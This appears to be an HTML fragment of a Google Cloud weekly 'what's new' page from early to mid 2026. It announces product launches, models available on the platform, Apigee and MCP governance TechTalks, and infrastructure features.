<li><strong>How to Configure Gemini Enterprise to Connect to a Custom MCP Server<br></strong>The Gemini Enterprise MCP Connector was a big announcement at Google Cloud Next because it introduces the ability to connect Gemini Enterprise to MCP servers. This blog <a href="https://medium.com/google-cloud/how-to-configure-gemini-enterprise-to-connect-to-a-custom-mcp-server-2e28adc96420" rel="noopener" target="_blank">post</a> provides a step-by-step guide on how to configure your first Custom MCP Server connector using the Google Maps Ground Lite MCP server as an example. Once you understand this flow, you can configure multiple MCP servers with Gemini Enterprise to bring all the context you need.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 8 - Jun 12</h3>
<ul>
<li><strong>Simplify Multi-Cloud Planning with Cloud Location Finder, now Generally Available</strong> <br>Cloud Location Finder provides up-to-date data on public regions, zones, and Google Distributed Cloud Connected locations across Google Cloud, AWS, Azure, and OCI. You can now programmatically discover locations based on provider, proximity, territory, and carbon footprint to optimize your global infrastructure strategy for performance, compliance, and sustainability. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="14" href="https://cloud.google.com/location-finder/docs" rel="noreferrer noopener" target="_blank">Get started for free today</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 1 - Jun 5</h3>
<ul>
<li><strong>Modeling the physical world with BigQuery Graph</strong><br>Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/blog/products/data-analytics/modeling-a-digital-twin-using-bigquery-graph" rel="noreferrer noopener" target="_blank">post</a>, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.</li>
<li><strong>Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)<br></strong>Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4dyC2Ie" rel="noreferrer noopener" target="_blank"><strong>Register for the June 18 Spanish Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 25 - May 29</h3>
<ul>
<li>
<p><strong><a href="https://www.anthropic.com/news/claude-opus-4-8" rel="noopener" target="_blank"><span>Anthropic’s Claude Opus 4.8</span></a><span> is now available on </span><a href="https://console.cloud.google.com/vertex-ai/publishers/anthropic/model-garden/claude-opus-4-8"><span>Gemini Enterprise Agent Platform</span></a></strong><span><strong>. </strong></span><span>As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.</span></p>
</li>
<li><strong>API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs <br></strong>Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.<strong><br><br><a href="https://goo.gle/4dTxQmo" rel="noopener" target="_blank">Register now</a></strong></li>
<li><strong>Securing AI Agents: The Extended Agent Gateway Pattern<br></strong>Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.<br><br><a href="https://goo.gle/4fbAsxg" rel="noopener" target="_blank"><strong>Register for the June 4 Community TechTalk</strong></a></li>
<li><strong>API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP<br></strong>Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.<br><br><a href="https://goo.gle/4nVyjIr" rel="noopener" target="_blank"><strong>Register for the June 11 Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 18 - May 22</h3>
<ul>
<li><strong>Chinese Webinar | June 4: AI Command and Control<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.<br><br><a href="https://goo.gle/4dx4Lf5" rel="noopener" target="_blank">Register here</a></li>
<li><strong>GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases<br></strong>Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new <a href="https://cloud.google.com/blog/products/ai-machine-learning/benchmark-llms-on-device-with-ai-edge-portal" rel="noopener" target="_blank">capabilities</a> to benchmark and debug LLM performance across these devices. <a href="https://docs.google.com/forms/d/e/1FAIpQLSfTcGPycQve8TLAsfH46pBlXBZe9FrgJAClwbF7DeL1LgVn4Q/viewform" rel="noopener" target="_blank">Sign-up</a> to utilize these new features in private preview today.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 11 - May 15</h3>
<ul>
<li><strong>Build Your AI &amp; MCP Control Tower for Universal Governance<br></strong>Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.<br><br><a href="https://goo.gle/4u9slWF" rel="noopener" target="_blank">Register for the May 21 Community TechTalk</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 27 - May 1</h3>
<ul>
<li><strong>Master Your Launch: The Apigee Production Go-Live Checklist<br></strong>Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.<br><br><strong><a href="https://goo.gle/4elMCTI" rel="noopener" target="_blank">Register for the May 28 Community TechTalk</a></strong></li>
<li>
<p><strong>Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform<br></strong><span>Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.</span></p>
<p><a href="https://goo.gle/3PfWm7M" rel="noopener" target="_blank">Register for the May 7 Community TechTalk</a></p>
</li>
<li><a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-machine-types" rel="noopener" target="_blank">Fractional G4 VMs</a> are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
<ul>
<li><strong>1/2 GPU:</strong> Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.</li>
<li><strong>1/4 GPU:</strong> Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.</li>
<li><strong>1/8 GPU:</strong> Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.</li>
</ul>
</li>
<li>
<p>Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI &amp; Agentic solutions are robust, secure, and ready for the real world.</p>
<p><a href="https://lnkd.in/gHBH8cTv" rel="noopener" target="_blank">Watch the deep dive</a> and <a href="https://discuss.google.dev/t/beyond-the-prototype-scaling-production-grade-agents-with-gemini/356140" rel="noopener" target="_blank">read the developer blog</a> to learn more.</p>
</li>
<li><strong>ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available<br></strong>Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
<ul>
<li><strong>Install from Marketplace:</strong> <a href="https://marketplace.visualstudio.com/items?itemName=GoogleCloudTools.workbench-notebooks" rel="noopener" target="_blank">GoogleCloudTools.workbench-notebooks</a></li>
<li><strong>Contribute on GitHub:</strong> <a href="https://github.com/GoogleCloudPlatform/colab-enterprise-vscode" rel="noopener" target="_blank">colab-enterprise-vscode</a></li>
</ul>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 20 - Apr 24</h3>
<ul>
<li><strong>Announcing the 2026 Google Cloud Partners of the Year<br></strong>Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.<br><br>See the <a href="https://cloud.google.com/blog/topics/partners/2026-partners-of-the-year-winners-next26">2026 Partner Award winners</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 13 - Apr 17</h3>
<ul>
<li>We're excited to announce the <strong>Public Preview of Datastream’s metadata integration with Knowledge Catalog</strong>. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.</li>
<li><strong>Upgrading Apigee OPDK to 4.53 with OS Modernization<br></strong>Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition<br><br><a href="https://goo.gle/3Oa8uqy" rel="noopener" target="_blank">Read the guide</a></li>
<li><strong>Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale<br></strong>Google Cloud has announced the General Availability of <strong>Cloud Run worker pools</strong>, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the <strong>Cloud Run External Metrics Autoscaler (CREMA)</strong>. Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.</li>
<li><strong>Apigee Model Context Protocol (MCP) now Generally Available<br></strong>Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.<br><br><a href="https://goo.gle/3QfoEQ4" rel="noopener" target="_blank"><em>Explore the MCP overview</em></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 6 - Apr 10</h3>
<ul>
<li><strong>Community TechTalk: Powering Retail Agents with ADK, UCP &amp; Apigee X<br></strong>Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.<br><br><a href="https://goo.gle/41ocUgq" rel="noopener" target="_blank"><span>Register for the TechTalk</span></a></li>
<li><strong>Implement multimodal capabilities in your AI agents<br></strong>Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see <a href="https://docs.cloud.google.com/architecture/agentic-ai-classify-multimodal-data"><span>Classify multimodal data</span></a><span>. To create a fluid conversational AI that processes audio and video streams in real time, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-bidirectional-multimodal-streaming"><span>Enable live bidirectional multimodal streaming</span></a><span>. To consolidate fragmented multimodal data into a searchable knowledge graph, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-multimodal-graph-rag-resource-orchestration"><span>Multimodal GraphRAG resource orchestration</span></a><span>.</span></li>
<li><strong>Automate SecOps workflows with an agentic AI system<br></strong>To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to <a href="https://docs.cloud.google.com/architecture/agentic-ai-orchestrate-security-ops-workflows"><span>orchestrate security operations workflows</span></a><span>.</span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 30 - Apr 3</h3>
<ul>
<li><strong>ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts <strong>Shilpi Puri &amp; Wely Lau</strong> for a <strong>webinar</strong> on <strong>April 30th at 11:00 AM SGT</strong> to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br><a href="https://goo.gle/47FX1Wn" rel="noopener" target="_blank"><strong>RSVP here.</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 23 - Mar 27</h3>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Turn your API sprawl into an agent-ready catalog<br></strong><span>As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.<br><br></span><a href="https://goo.gle/47dEYqc" rel="noopener" target="_blank"><span>Read the full blog post to get started.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Webinar | April 16: AI Command &amp; Control<br></strong><span>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br></span><a href="https://goo.gle/4t43Vg4" rel="noopener" target="_blank"><span>RSVP here.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Modernizing and Decoupling Event Ingestion with Apigee<br></strong><span>In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.</span><br><br><a href="https://goo.gle/3POgsWF" rel="noopener" target="_blank"><span>Read the full guide.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 16 - Mar 20</h3>
<ul>
<li><strong>Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades<br></strong>The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.<br><br><a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist">Explore</a> the full range of what the assistant can do.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 9 - Mar 13</h3>
<ul>
<li>
<div><strong>Want to use Gemini to develop code and don't know where to start?</strong><br>This <a href="https://medium.com/google-cloud/supercharge-your-spark-development-with-gemini-1540f1cb47d4" rel="noopener" target="_blank">article</a> includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github. </div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 2 - Mar 6</h3>
<ul>
<li>
<p><span><strong>Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model.</strong> Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.</span></p>
<p><span>Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via </span><a href="https://console.cloud.google.com/vertex-ai/studio/multimodal?mode=prompt&amp;model=gemini-3.1-flash-lite-preview"><span>Vertex AI</span></a><span> and </span><span>developers via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-flash-lite-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>.</span></p>
</li>
<li>
<div>
<p><strong>TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee</strong><br>Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.</p>
<p><a href="https://goo.gle/4r6o6Zi" rel="noopener" target="_blank">Register for the TechTalk</a></p>
</div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 23 - Feb 27</h3>
<ul>
<li>
<p><span><strong>Pro-level image generation gets faster and more accessible with Nano Banana 2<br></strong></span><span>Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model </span><a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2" rel="noopener" target="_blank"><span>here</span></a><span>.</span></p>
</li>
</ul>
<ul>
<li>
<p><strong>The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud<br></strong><span>Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.</span></p>
<p><span>By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy. <br><br></span><a href="https://discuss.google.dev/t/the-intelligent-path-to-compliance-transforming-regulatory-quality-control-with-google-cloud/335276" rel="noopener" target="_blank"><span>Learn more</span></a><span>.</span></p>
</li>
<li><span><span>Stop typing, start interacting! <strong>The Gemini Live Agent Challenge is here</strong>. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!<br><br></span><span>Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at </span><a href="http://geminiliveagentchallenge.devpost.com/" rel="noopener" target="_blank"><span>geminiliveagentchallenge.devpost.com</span></a></span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 9 - Feb 13</h3>
<ul>
<li>
<p><strong><span>Introducing Gemini 3.1 Pro on Google Cloud. </span></strong></p>
<span>3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our </span><a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-is-available-for-enterprise?e=48754805"><span>goal</span></a><span> to help you transform your business for the agentic future. Learn more about the model’s capabilities </span><a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro" rel="noopener" target="_blank"><span>here</span></a><span>. Gemini 3.1 Pro is available starting today in preview in </span><a href="https://cloud.google.com/vertex-ai?e=48754805"><span>Vertex AI</span></a><span> and </span><a href="https://cloud.google.com/gemini-enterprise?e=48754805"><span>Gemini Enterprise</span></a><span>. Developers can access the model in preview via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>, </span><a href="https://developer.android.com/studio" rel="noopener" target="_blank"><span>Android Studio</span></a><span>, </span><a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"><span>Google Antigravity</span></a><span>, and </span><a href="https://geminicli.com/" rel="noopener" target="_blank"><span>Gemini CLI</span></a><span>.<br><br></span></li>
<li><strong>Automate Storage Compatibility with GKE Dynamic Default Storage Classes<br></strong>Managing storage across mixed-generation VM clusters in GKE just got easier. With the new <strong>Dynamic Default Storage Class</strong>, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.<br><br><a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/hyperdisk#automated_disk_type_selection" rel="noopener" target="_blank">Explore automated disk type selection</a></li>
<li>
<p><strong>Community TechTalk: AI-Powered Apigee Development with strofa.io<br></strong><strong>Join the Apigee community on February 26</strong><span> for a deep dive into</span> <a href="https://www.google.com/search?q=http://strofa.io" rel="noopener" target="_blank"><span>strofa.io</span></a><span>. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.</span></p>
<p><a href="https://goo.gle/3Oerns3" rel="noopener" target="_blank"><span>Register now to reserve your spot.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 26 - Jan 30</h3>
<ul>
<li><strong><span>Simplify API Governance with Native OpenAPI v3 Support<br></span></strong>Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.<br><br><a href="https://goo.gle/49Wx58Z" rel="noopener" target="_blank"><span>Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.</span></a></li>
</ul>
<ul>
<li><strong><span>Accelerate API Testing with the New Open Source API Tester<br></span></strong>Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like <code>proxy.basepath</code><span> without leaving your terminal.<br><br></span><a href="https://goo.gle/4q5WDGK" rel="noopener" target="_blank"><span>Explore the API Tester guide and start testing your proxies today.</span></a></li>
<li><strong><span>Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid<br></span></strong>Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via <code>kubectl</code><span>, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.<br><br></span><a href="https://goo.gle/4qEVffo" rel="noopener" target="_blank"><span>Implement Kubernetes Secrets in your hybrid proxies.</span></a></li>
<li><strong><span>See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud<br></span></strong>Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings  -&gt; Appearance menu.<br><br><a href="https://docs.cloud.google.com/docs/get-started/console-appearance"><span>Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!</span></a></li>
<li><strong><span>Apigee X Networking: PSC or VPC Peering?<br></span></strong>Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.<br><br><a href="https://goo.gle/4bWBGdV" rel="noopener" target="_blank"><span>Watch the video.</span></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 19 - Jan 23</h3>
<ul>
<li><strong>Bridge the Gap: Excel-to-API Conversion in Apigee Portals<br></strong><span>Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.<br><br></span><a href="https://goo.gle/3Nq3Pjo" rel="noopener" target="_blank"><span>Learn how to build it</span></a><span>.</span></li>
